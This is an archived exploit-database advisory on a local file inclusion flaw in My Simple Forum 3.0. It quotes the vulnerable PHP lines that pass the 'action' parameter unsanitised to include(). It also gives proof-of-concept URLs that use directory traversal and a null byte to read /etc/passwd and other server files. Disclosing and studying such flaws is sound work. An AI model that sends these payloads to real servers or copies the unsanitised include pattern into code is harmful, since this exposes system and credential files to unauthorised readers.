My Simple Forum 3.0 (index.php action) Local File Inclusion Vulnerability

vendor:

My Simple Forum

by:

cOndemned

7.5

CVSS

HIGH

Local File Inclusion

CWE

Product Name: My Simple Forum

Affected Version From: 3

Affected Version To: 3

Patch Exists: Yes

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

My Simple Forum 3.0 (index.php action) Local File Inclusion Vulnerability

My Simple Forum 3.0 is vulnerable to a local file inclusion vulnerability due to a lack of sanitization of the 'action' parameter in the index.php file. An attacker can exploit this vulnerability by sending a crafted HTTP request with a malicious 'action' parameter containing directory traversal sequences (e.g. '../../../../../../../etc/passwd%00') to the vulnerable server. This will allow the attacker to read arbitrary files from the server.

Mitigation:

The vendor has released a patch to address this vulnerability. Users should upgrade to the latest version of My Simple Forum.

Source

Exploit-DB raw data:

/*

	$Id: mysimpleforum-3.0-lfi.txt,v 0.1 2008/12/04 23:03:00 cOndemned Exp $

	My Simple Forum 3.0 (index.php action) Local File Inclusion Vulnerability
	Bug discovered by cOndemned

	Script download: http://drennansoft.com/index.php?action=download&id=1

	Greetz: ZaBeaTy, str0ke, d2, TBH, Avantura

*/


Source of index.php:

	49.	if(file_exists('site/'.$_GET['action'].'.php')) {
	50.	include('site/'.$_GET['action'].'.php');
	51.	} else {
	
	local file inclusion on line 50
	

Proof of concept:

	http://[host]/[my_simple_forum_path]/index.php?action=../../../../../../../etc/passwd%00
	http://[host]/[my_simple_forum_path]/index.php?action=../../../../[localfile]%00

# milw0rm.com [2008-12-04]